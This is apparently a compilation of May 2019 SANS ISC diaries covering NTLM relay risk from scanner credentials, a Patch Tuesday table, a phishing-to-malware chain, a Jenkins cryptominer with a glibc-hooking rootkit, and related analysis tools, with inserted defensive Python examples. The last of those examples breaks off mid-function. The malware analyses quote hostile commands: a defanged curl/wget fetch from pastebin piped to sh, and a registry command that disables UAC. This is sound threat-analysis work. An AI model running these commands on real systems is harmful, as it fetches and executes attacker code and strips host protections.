Five years ago I wrote a diary on how metadata could be used to detect suspicious activity. Obviously, collecting packets allows the analyst to scrutinize the payload, which allows in-depth analysis. However, with more content being encrypted and the cost of storing terabytes of packets, more organizations are now looking at a metadata-only approach as good enough to respond to incidents.
Lately, I had discussions on what might be the "next generation of super tools" to help catch bad actors in a network. If you already have logs from many sources plus metadata, with full packet capture at some key locations, tools like User and Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) are becoming really effective at catching bad actors in the network and are, in some cases, becoming a replacement for full packet capture.
This appears to be true when combining data from sources such as network device logs with endpoint activity. Not that long ago, network forensic tools (NFTs) were storing everything in/out of a network as raw packets, but today's fast networks make this approach pretty much impractical for nearly everyone. This is where rich host and network metadata can capture most of the information required and provide much better investigative value for the money: it is easier and in most cases faster to find issues lurking in the network, at a much lower computational and storage cost.
There are still some cases where metadata might be insufficient and packet capture might be required to complement the investigation, but that is becoming rarer.
What do you think currently works best for you in detecting actors inside a network: logs, packets, UEBA, EDR or a combination of some of these tools?
ISC Stormcast For Friday, May 17th 2019 https://isc.sans.edu/podcastdetail.html?id=6502, (Fri, May 17th)
NTLM relay attacks have been a well-known way to attack Microsoft Windows environments for a while, and they usually remain successful. The magic of NTLM relay attacks? You don't need to lose time cracking the hashes; just relay them to the victim machine. To achieve this, we need a "responder" that will capture the authentication session on a system and relay it to the victim. A lab is easy to set up: install the Responder framework. The framework contains a tool called MultiRelay.py which helps to relay the captured NTLM authentication to a specific target and, if the attack is successful, execute some code! (There are plenty of blog posts that explain in detail how to (ab)use this attack scenario.)
Once you have deployed all the tools, you need to wait for an "interesting" user to connect to the infected system. How do you find such juicy user credentials? Most vulnerability scanners offer different scanning modes. The classic one is a non-authenticated scan based on available ports (compare this to a penetration test in "black box" mode). In many organizations, scans are performed in "authenticated mode". This time, the scanner has credentials to connect to targets and is therefore able to access more information, like the list of installed applications (compare this to a penetration test in "grey box" mode). See the example below with the free scanner OpenVAS:
You can configure OpenVAS to collect information via SSH, SMB, SNMP or even connect to a VMware hypervisor. To achieve this, you need to provide valid credentials that have enough access rights to perform basic tasks on the scanned hosts.
I was aware of a case where attackers implemented an NTLM relay on a first victim's host and waited for some SMB authentication. The vulnerability scanner used credentials to perform an authenticated scan, and its connection details were automatically reused to pivot internally and infect more hosts. Given that such users have more rights to do their job, they are always an interesting candidate for attackers.
So keep in mind that using security tools can also introduce new risks! By the way, how do you protect yourself against this type of attack? Use SMBv3 and enable SMB signing!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Thursday, May 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6500, (Thu, May 16th)
ISC Stormcast For Wednesday, May 15th 2019 https://isc.sans.edu/podcastdetail.html?id=6498, (Wed, May 15th)
VMware just released a security update to address a DLL-hijacking issue affecting VMware Workstation Pro / Player. Details: https://www.vmware.com/security/advisories/VMSA-2019-0007.html, (Tue, May 14th)
This month we got patches for 79 vulnerabilities from Microsoft and 2 from Adobe. Of those, 23 are critical and 2 were previously known, including one that has been exploited in the wild.
The exploited vulnerability (CVE-2019-0863) affects the way Windows Error Reporting (WER) handles files. It may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. The CVSS V3 score for this vulnerability is 7.8.
The other previously known one (CVE-2019-0932) is an information disclosure vulnerability affecting Skype for Android. By exploiting it, an attacker could listen to the conversation of a Skype for Android user without the user's knowledge.
Amongst the critical vulnerabilities, it is worth mentioning a remote code execution in Windows Remote Desktop Services (CVE-2019-0708). An unauthenticated attacker may exploit this vulnerability by sending specially crafted packets to the vulnerable service and then execute arbitrary code on the target system. It affects Windows 7 and Windows Server 2008. The CVSS V3 score for this vulnerability is 9.8.
Last but not least, we have a new critical remote code execution vulnerability affecting GDI+ (Windows Graphics Device Interface). An attacker could exploit this vulnerability by convincing the user to open a specially crafted attachment in an e-mail or instant message, for example. The CVSS V3 score for this vulnerability is 8.8.
See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

| Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base | CVSS Temporal |
|---|---|---|---|---|---|---|---|---|
| | ADV990001 | No | No | - | - | Critical | | |
| May 2019 Adobe Flash Security Update | ADV190012 | No | No | - | - | Critical | | |
| Microsoft Azure AD Connect Elevation of Privilege Vulnerability | CVE-2019-1000 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Browser Memory Corruption Vulnerability | CVE-2019-0940 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Microsoft Dynamics On-Premise Security Feature Bypass | CVE-2019-1008 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Edge Elevation of Privilege Vulnerability | CVE-2019-0938 | No | No | - | - | Important | 4.2 | 3.8 |
| Microsoft Edge Memory Corruption Vulnerability | CVE-2019-0926 | No | No | - | - | Critical | 4.2 | 3.8 |
| Microsoft Guidance to mitigate Microarchitectural Data Sampling vulnerabilities | ADV190013 | No | No | More Likely | More Likely | Important | | |
| Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0945 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0946 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0947 | No | No | - | - | Important | | |
| Microsoft Office SharePoint XSS Vulnerability | CVE-2019-0963 | No | No | - | - | Important | | |
| Microsoft SQL Server Analysis Services Information Disclosure Vulnerability | CVE-2019-0819 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft SharePoint Elevation of Privilege Vulnerability | CVE-2019-0957 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft SharePoint Elevation of Privilege Vulnerability | CVE-2019-0958 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft SharePoint Server Information Disclosure Vulnerability | CVE-2019-0956 | No | No | - | - | Important | | |
| Microsoft SharePoint Server Remote Code Execution Vulnerability | CVE-2019-0952 | No | No | - | - | Important | | |
| Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0949 | No | No | - | - | Important | | |
| Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0950 | No | No | - | - | Important | | |
| Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0951 | No | No | - | - | Important | | |
| Microsoft Word Remote Code Execution Vulnerability | CVE-2019-0953 | No | No | Less Likely | Less Likely | Critical | | |
| NuGet Package Manager Tampering Vulnerability | CVE-2019-0976 | No | No | Less Likely | Less Likely | Important | | |
| Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-0708 | No | No | - | - | Critical | 9.8 | 8.8 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-0884 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-0911 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-0918 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Skype for Android Information Disclosure Vulnerability | CVE-2019-0932 | Yes | No | Less Likely | Less Likely | Important | | |
| Unified Write Filter Elevation of Privilege Vulnerability | CVE-2019-0942 | No | No | Less Likely | Less Likely | Important | 4.4 | 4.0 |
| Win32k Elevation of Privilege Vulnerability | CVE-2019-0892 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows DHCP Server Remote Code Execution Vulnerability | CVE-2019-0725 | No | No | Less Likely | Less Likely | Critical | 8.1 | 7.3 |
| Windows Defender Application Control Security Feature Bypass Vulnerability | CVE-2019-0733 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-0734 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-0936 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows Error Reporting Elevation of Privilege Vulnerability | CVE-2019-0863 | Yes | Yes | Detected | Detected | Important | 7.8 | 7.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-0882 | No | No | More Likely | More Likely | Important | 4.7 | 4.2 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-0961 | No | No | More Likely | More Likely | Important | 4.7 | 4.2 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-0758 | No | No | More Likely | More Likely | Important | 4.7 | 4.2 |
| Windows Hyper-V Information Disclosure Vulnerability | CVE-2019-0886 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Kernel Elevation of Privilege Vulnerability | CVE-2019-0881 | No | No | More Likely | More Likely | Important | 8.8 | 7.9 |
| Windows NDIS Elevation of Privilege Vulnerability | CVE-2019-0707 | No | No | More Likely | More Likely | Important | 7.0 | 6.3 |
| Windows OLE Remote Code Execution Vulnerability | CVE-2019-0885 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows Storage Service Elevation of Privilege Vulnerability | CVE-2019-0931 | No | No | More Likely | More Likely | Important | 7.0 | 6.3 |
ISC Stormcast For Tuesday, May 14th 2019 https://isc.sans.edu/podcastdetail.html?id=6496, (Tue, May 14th)
On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, those emails are simply part of classic phishing waves and try to steal credentials from victims, but this time it was not a simple phishing. Here is a copy of the email, nicely redacted:
When the victim clicks on the "Review and take action" button, (s)he is redirected to a first website: hxxp://xoxouload[.]ml
This automatically redirects to a second site via an HTTP/301 code: hxxp://217[.]199[.]187[.]73/verifiedvsa.com/www.office365.com/OneDrive.htm
The following picture is displayed:
Yes, this is just a simple picture; no links are active. So where is the issue? Two seconds after the page has loaded, the browser asks the victim to save a file. The HTML code indeed contains a new redirect:
<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">
The shortened URL links to: hxxp://lichxuanohha[.]com/wp-content/themes/xcx/i47.php
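The timed meta-refresh above is the kind of thing that is easy to miss when a page shows nothing but an image. As an added example (not code from the original diary), the script below pulls every meta-refresh redirect out of a saved page, reports the delay and target, and flags targets that point at a link shortener. The sample page and the shortener list are constructed for the example; the refresh tag mirrors the one quoted in the diary with its URL kept defanged.

```python
"""Added example (not from the original diary): extract HTML meta-refresh
redirects from a fetched phishing page and flag the ones that bounce the
visitor to a link shortener. The sample page is constructed; the refresh
tag mirrors the one quoted in the diary (URL kept defanged)."""
from html.parser import HTMLParser
import re

# Shorteners worth a second look when they appear as a refresh target.
# This list is an assumption for the example, not from the diary.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl"}

# content="<delay>;URL=<target>" in its usual spellings (case-insensitive, optional quotes)
_CONTENT_RE = re.compile(
    r"^\s*(\d+)\s*(?:;\s*url\s*=\s*['\"]?([^'\"]*)['\"]?)?\s*$", re.I)


class MetaRefreshParser(HTMLParser):
    """Collects (delay_seconds, target_url) tuples from <meta http-equiv=refresh>."""

    def __init__(self):
        super().__init__()
        self.redirects = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = _CONTENT_RE.match(a.get("content", ""))
        if m:
            self.redirects.append((int(m.group(1)), (m.group(2) or "").strip()))


def find_meta_refresh(html: str):
    """Return all meta-refresh redirects found in the document."""
    p = MetaRefreshParser()
    p.feed(html)
    p.close()
    return p.redirects


def refang(url: str) -> str:
    """Undo the usual hxxp / [.] defanging so the host can be parsed."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def host_of(url: str) -> str:
    """Host part of a (possibly defanged) URL, lower-cased."""
    m = re.match(r"^[a-z]+://([^/:?#]+)", refang(url), re.I)
    return m.group(1).lower() if m else ""


def triage(html: str):
    """One finding per redirect: delay, target and whether it hits a shortener."""
    return [{"delay": delay, "url": url, "shortener": host_of(url) in SHORTENER_HOSTS}
            for delay, url in find_meta_refresh(html)]


# Constructed sample: an image-only page carrying the diary's timed redirect.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">
</head><body><img src="onedrive.png"></body></html>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_PAGE):
        print(finding)
```

Running it on a page saved from the redirect chain prints the delay and the shortener target, which is the signal to follow the link in a sandbox rather than trust the "static" page.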
This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the first time on Friday, it was unknown on VT. Since then, it has been uploaded by someone else and has a score of 47/71. The file is identified by many AVs as a banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:
I searched for this email address and found a Tweet by @malwarehunterteam from April 25:
Some actions performed by the malware:
C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\
This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"
"C:\Windows\System32\migwiz\migwiz.exe"
C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The last command sets EnableLUA to 0, which disables User Account Control.
I saw many files created on the Desktop with filenames like "lock_<randomstring>.<extension>", but the honeypot files were not encrypted. I'm still having a look at the sample.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Monday, May 13th 2019 https://isc.sans.edu/podcastdetail.html?id=6494, (Mon, May 13th)
If you follow us and read our daily diaries, you probably already know some of the famous tools developed by Didier (like oledump.py, translate.py and many more). Didier uses them all the time to analyze malicious documents. His tools are also used by many security analysts and researchers. The complete toolbox is available on his github.com page. You can clone the repository or download the complete package as a zip archive. However, it's not convenient to install them every time you switch computers if, like me, you're always on the road between different customers.
Being a fan of Docker containers, I built a Docker image called "DSSuite" (not a very original name :-) that contains all of Didier's tools preinstalled and ready to use from any system that has Docker available. The image is available on hub.docker.com.
To use it, just pull the image:
$ docker pull rootshell/dssuite
Once done, you can use the tools directly from Docker or start an interactive shell. First, let's try a simple oledump against a sample OLE file:
$ file malicious_ole.vir
malicious_ole.vir: Composite Document File V2 Document, Cannot read section info
$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious_ole.vir
  1: O   49737 '\x01Ole10Native'
  2:         6 '\x03ObjInfo'
If you don't pass arguments to the container, an interactive shell will be started:
$ docker run -it -v $(pwd):/malware rootshell/dssuite
 ____  ____  ____        _ _
|  _ \/ ___|/ ___| _   _(_) |_ ___
| | | \___ \___ \| | | | | __/ _ \
| |_| |___) |__) | |_| | | || __/
|____/|____/____/ \__,_|_|\__\___|
Version 1.0 - Help: https://blog.didierstevens.com/my-software/
root@a43d72df1d9b:/malware#
Note that you need to map a /malware volume to access the malicious files to analyze.
For more convenience, just create an alias like this in your shell to call the commands directly (the shell appends whatever follows the alias to the command, so no $@ is needed; the single quotes keep $(pwd) from being expanded until the alias is used):
$ alias dssuite='docker run -it --rm -v $(pwd):/malware rootshell/dssuite'
$ dssuite oledump.py sample.doc
Most of the tools run out of the box, but let me know if you detect some issues and I'll keep the Docker image updated.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, May 10th 2019 https://isc.sans.edu/podcastdetail.html?id=6492, (Fri, May 10th)
ISC Stormcast For Thursday, May 9th 2019 https://isc.sans.edu/podcastdetail.html?id=6490, (Thu, May 9th)
ISC Stormcast For Wednesday, May 8th 2019 https://isc.sans.edu/podcastdetail.html?id=6488, (Wed, May 8th)
For today's diary I play a game of email roulette. My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware. I acquired a recent malspam example through VirusTotal (VT) Intelligence. Let's see what the roulette wheel gives us today!
Searching for malspam attachments in VT Intelligence
VT Intelligence is a subscription service, and from what I understand, it's fairly expensive. Fortunately, I have access through my employer. In the VT Intelligence search window, I used the following parameters:
tag:attachment fs:2019-05-07+ p:3+
This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious. After the results appeared, I sorted by the most recent submissions.
The three most recent results I saw were 7-zip archives (.7z files). The file names did not use plain ASCII characters but were base64 encoded. The base64 string represents UTF-8 characters, in the format name:"=?utf-8?B?[base64 string]?=" (an RFC 2047 encoded word).
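Decoding such a name by hand means stripping the =?utf-8?B? wrapper and base64-decoding the middle. As an added example (not from the original diary), the script below does it with Python's email package, which understands RFC 2047 encoded words, and also shows how to pull the filename out of a full Content-Disposition header. The header and the Korean-looking filename are constructed for the example.

```python
"""Added example (not part of the original diary): decode the
"=?utf-8?B?...?=" attachment names described above. These are RFC 2047
encoded words, which Python's email package decodes. The header below is
constructed for the example and the filename is made up."""
import base64
import re
from email.header import decode_header, make_header

_ENCODED_WORD = re.compile(r"=\?[^?]+\?[bq]\?[^?]*\?=", re.I)


def decode_attachment_name(raw: str) -> str:
    """Turn a raw filename parameter (possibly an encoded word) into a str."""
    return str(make_header(decode_header(raw.strip().strip('"'))))


def filename_from_header(header_value: str) -> str:
    """Extract and decode the filename from a Content-Disposition value."""
    m = re.search(r'filename\s*=\s*("[^"]*"|[^;]+)', header_value, re.I)
    if not m:
        return ""
    return decode_attachment_name(m.group(1))


def describe(raw: str) -> dict:
    """Report what an encoded-word filename hides: charset, raw bytes, final name."""
    info = {"encoded": bool(_ENCODED_WORD.search(raw)), "charset": None,
            "name": decode_attachment_name(raw)}
    m = re.match(r'"?=\?([^?]+)\?([bq])\?([^?]*)\?="?', raw.strip(), re.I)
    if m:
        info["charset"] = m.group(1).lower()
        if m.group(2).lower() == "b":
            info["raw_bytes"] = base64.b64decode(m.group(3))
    return info


def encode_word(name: str) -> str:
    """Build a base64 encoded word the way a mail client would (used for the sample)."""
    b64 = base64.b64encode(name.encode("utf-8")).decode("ascii")
    return f"=?utf-8?B?{b64}?="


# Constructed sample: a non-ASCII archive name as it would appear in the header.
SAMPLE_NAME = "견적서_2019-05.7z"
SAMPLE_HEADER = f'attachment; filename="{encode_word(SAMPLE_NAME)}"'

if __name__ == "__main__":
    print(SAMPLE_HEADER)
    print(filename_from_header(SAMPLE_HEADER))
    print(describe(encode_word(SAMPLE_NAME)))
```

The raw bytes are worth keeping alongside the decoded name: a double extension or a right-to-left override character hides in the bytes long before it shows up in a rendered filename.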
I picked the most recent result and selected the relations tab, which revealed the associated malspam. Then I retrieved that email from VT Intelligence.
The attached 7-zip archive contained 3 files with different names, but they all had the same file hash, so they were the same malware. I extracted them and ran one on a vulnerable Windows host. The result was a Gandcrab ransomware infection.
The following are indicators associated with this infection:
- File size: 157,810 bytes
- File description: Example of Korean malspam (.eml file) pushing Gandcrab
- File size: 112,792 bytes
- File description: 7-zip archive (.7z file) attached to Korean malspam
- File size: 173,568 bytes
- File description: Gandcrab executables (.exe files) extracted from the above .7z archive
- Any.Run sandbox analysis
This round of email roulette gave us a Gandcrab ransomware infection. What type of malware might I find next? Perhaps we'll know when I try this again next month for another diary.
brad [at] malware-traffic-analysis.net
An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.
The exploited vulnerability, CVE-2018-1000861, was published in December 2018. It affects the Stapler web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.
Looking for publicly available exploits for this vulnerability, I found a detailed proof of concept published early March this year.
After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.
In the picture below, you can see the exploitation occurring.
Notice that there is base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:
(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh
The content of the paste 'wDBa7jCQ' is no longer available, but it was another paste:
(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh
The content of the 'D8E71JBJ' paste is no longer available either, but it was the shell script shown in the following images.
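The base64-to-bash stage above is easy to detect once you decode what is being piped. As an added example (not code from the original diary), the script below walks through captured command lines, decodes any base64 run that yields printable text, and flags the traits seen here: a curl/wget fetch, a pipe into a shell, and a pastebin raw URL. The audit lines are constructed for the example; the decoded payload is the diary's own first-stage command, kept defanged.

```python
"""Added example, not from the original diary: decode base64 blobs found in
captured command lines and flag the "fetch from pastebin and pipe to a shell"
pattern described above. The log lines are constructed for the example; the
inner curl/wget command mirrors the one quoted in the diary (defanged)."""
import base64
import re
import string

_B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
_PRINTABLE = set(bytes(string.printable, "ascii"))

# Heuristics used by classify(); assumptions for this example.
_FETCH = re.compile(r"\b(curl|wget)\b", re.I)
_PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash)\b")
_PASTE_HOST = re.compile(r"pastebin\[?\.\]?com/raw/", re.I)


def decode_b64_blobs(cmdline: str):
    """Decoded text for every base64 run in cmdline that decodes to printable data."""
    out = []
    for m in _B64_RUN.finditer(cmdline):
        token = m.group(0)
        token += "=" * (-len(token) % 4)  # repair stripped padding
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:
            continue
        if raw and all(b in _PRINTABLE for b in raw):
            out.append(raw.decode("ascii"))
    return out


def classify(text: str):
    """Name the suspicious traits present in a decoded payload."""
    traits = []
    if _FETCH.search(text):
        traits.append("remote-fetch")
    if _PIPE_TO_SHELL.search(text):
        traits.append("pipe-to-shell")
    if _PASTE_HOST.search(text):
        traits.append("pastebin-raw")
    return traits


def scan_log(lines):
    """(line_no, decoded_payload, traits) for every line carrying a flagged blob."""
    hits = []
    for n, line in enumerate(lines, 1):
        for payload in decode_b64_blobs(line):
            traits = classify(payload)
            if traits:
                hits.append((n, payload, traits))
    return hits


# First stage as quoted in the diary (defanged), base64-wrapped the way it was delivered.
STAGE1 = ("(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ"
          "||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh")
STAGE1_B64 = base64.b64encode(STAGE1.encode()).decode()
NOISE_B64 = base64.b64encode(b"hello world, nothing to see here").decode()

# Constructed process-audit lines (not real captures).
SAMPLE_LOG = [
    "2019-05-06T10:01:02Z jenkins-01 auditd: exe=/bin/bash cmd='bash -c echo %s | base64 -d | bash'" % STAGE1_B64,
    "2019-05-06T10:01:05Z jenkins-01 auditd: exe=/usr/bin/git cmd='git fetch origin'",
    "2019-05-06T10:02:00Z jenkins-01 auditd: exe=/bin/bash cmd='echo %s | base64 -d'" % NOISE_B64,
]

if __name__ == "__main__":
    for n, payload, traits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {traits}\n  {payload}")
```

The third sample line decodes cleanly but carries none of the traits, so it is not reported; the point is to alert on what the decoded text does, not on the presence of base64 alone.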
The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.
After analyzing the binary, I could see that the packer used was a custom version of UPX. UPX is open source software and there are many ways it can be modified to make the file hard to unpack with the regular UPX version. There is a great presentation on this subject by @unixfreaxjp called 'Unpacking the non-unpackable' which shows different ways to fix ELF headers in order to unpack files.
Fortunately, in this case, the UPX customization involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, by reverting it to UPX in the different parts of the binary, it was possible to unpack the binary with the regular version of UPX.
The Glibc hooks
The other interesting part is the way 'Kerberods' acts to persist and hide itself if it has root privileges on the machine.
If that is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify their behavior. In other words, it acts like a rootkit.
In the image below it is possible to see that the function 'open' will now check for some strings in the 'pathname' and act differently. The intention is to prevent anyone (including root) from being able to open the binary 'khugepageds', which is the cryptominer, 'ld.so.preload', which is the file that loads the malicious library, and the library 'libpamcd.so' itself.
Another hook, to give one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.
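Because the hooks live in a library forced into every process through /etc/ld.so.preload, that file is the first place to look on a suspect host. As an added example (not code from the original diary), the script below parses ld.so.preload content, flags entries that warrant attention, and, in its live mode, treats "stat() sees the file but open() refuses it" as a finding in itself, since that is exactly the behaviour the open() hook above produces. The library name comes from the diary; the list of "standard" library directories and the sample content are assumptions for the example.

```python
"""Added example (not from the original diary): a quick review of
/etc/ld.so.preload, the file the Kerberods dropper uses to force its library
into every process. Parsing is separated from file access so the checks can
be exercised on constructed content. The 'standard' directory list and the
sample content are assumptions for the example."""
import os

# Directories where a legitimately preloaded library would normally live (assumption).
STANDARD_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
# Name reported in the diary for the dropped hooking library.
KNOWN_BAD_NAMES = {"libpamcd.so"}


def parse_preload(text: str):
    """Library paths listed in ld.so.preload content (comments and blanks stripped)."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        entries.extend(p for p in line.split() if p)  # whitespace-separated paths
    return entries


def assess_entries(entries):
    """Attach a list of reasons to every entry; an empty list means nothing stood out."""
    findings = []
    for path in entries:
        reasons = []
        if os.path.basename(path) in KNOWN_BAD_NAMES:
            reasons.append("name matches known hooking library")
        if not path.startswith("/"):
            reasons.append("relative path")
        elif not path.startswith(STANDARD_LIB_DIRS):
            reasons.append("outside standard library directories")
        findings.append((path, reasons))
    return findings


def inspect_preload(path="/etc/ld.so.preload"):
    """Live check: report presence, readability and per-entry findings.

    A file that exists but cannot be opened is itself a signal: the hooked
    open() described above blocks access to exactly this file."""
    report = {"present": os.path.exists(path), "readable": None, "findings": []}
    if not report["present"]:
        return report
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        report["readable"] = False
        return report
    report["readable"] = True
    report["findings"] = assess_entries(parse_preload(text))
    for lib, reasons in report["findings"]:
        # A listed library that exists but cannot be opened points at the same hook.
        if os.path.exists(lib):
            try:
                open(lib, "rb").close()
            except OSError:
                reasons.append("listed library exists but cannot be opened")
    return report


# Constructed content, as the dropper's file might look.
SAMPLE_PRELOAD = "/usr/local/lib/libpamcd.so\n"

if __name__ == "__main__":
    print(assess_entries(parse_preload(SAMPLE_PRELOAD)))
    print(inspect_preload())
```

On most systems ld.so.preload simply does not exist, so "present" alone is worth a ticket; a present file that a root shell cannot read is the strongest signal this script can give, because a userland hook is the usual explanation.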
Indicators of Compromise (IOCs)
ISC Stormcast For Tuesday, May 7th 2019 https://isc.sans.edu/podcastdetail.html?id=6486, (Tue, May 7th)
I gave a few tips over the last few weeks to help friends with processing files. It turned out that each time, UNICODE was involved.
Xavier had an issue with a malicious UDF file. I took a look with a binary editor:
The file command confirmed the endianness:
The fact that it contains just null bytes is unusual, but then again, this is actually not a text file but a UDF file that was probably opened and saved with a text editor.
Another friend had a problem getting an XML file parsed by a SIEM. It threw an unusual, obscure error. Here too, it turned out that the file was UNICODE, while the SIEM expected an ASCII file.
When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using a hexadecimal editor.
If you want a command-line tool, I recommend the file command.
For a GUI tool on Windows, you can use the free text editor Notepad++.
It displays the encoding of the displayed file in its status bar:
UCS-2 LE BOM tells us that the file contains a BOM and is little endian (UCS-2 is an ISO standard equivalent to UNICODE and the basis for UTF-16). And we get bonus information: the line separator is carriage return / line feed (CR LF). This was something Xavier had to deal with too.
This editor can of course convert encodings:
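The checks Notepad++ and the file command do for you (BOM, endianness, line separator) are short enough to script when a parser on a server chokes on a file and no GUI is at hand. As an added example (not from the original diary), the function below reports those properties from the raw bytes, falls back to the null-byte pattern for BOM-less UTF-16, and converts the file to plain UTF-8 with LF line endings, which is what an ASCII-expecting SIEM will usually accept. The sample inputs are constructed in the script; treating any non-ASCII, non-UTF-16 file as UTF-8 is an assumption of the example.

```python
"""Added example, not from the original diary: the BOM / null-byte checks
done by hand above, as a function, plus a conversion to UTF-8. Sample inputs
are constructed in the script."""
import codecs

_BOMS = [  # longest first so a UTF-32 LE BOM is not mistaken for UTF-16 LE
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8-sig"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
]


def sniff(data: bytes) -> dict:
    """Guess encoding, BOM, endianness and line separator of a text file."""
    info = {"encoding": None, "bom": False, "bom_len": 0, "endianness": None, "newline": None}
    for bom, name in _BOMS:
        if data.startswith(bom):
            info.update(encoding=name, bom=True, bom_len=len(bom))
            break
    else:
        # No BOM: nulls in every other byte position mean UTF-16 (this is what
        # the UDF file looked like under the hex editor). Assumption: anything
        # that is not ASCII and not UTF-16 is treated as UTF-8.
        sample = data[:4096]
        if sample:
            even = sample[0::2].count(0)
            odd = sample[1::2].count(0)
            if odd > len(sample) // 4 and even == 0:
                info["encoding"] = "utf-16-le"
            elif even > len(sample) // 4 and odd == 0:
                info["encoding"] = "utf-16-be"
            else:
                try:
                    sample.decode("ascii")
                    info["encoding"] = "ascii"
                except UnicodeDecodeError:
                    info["encoding"] = "utf-8"
    enc = info["encoding"]
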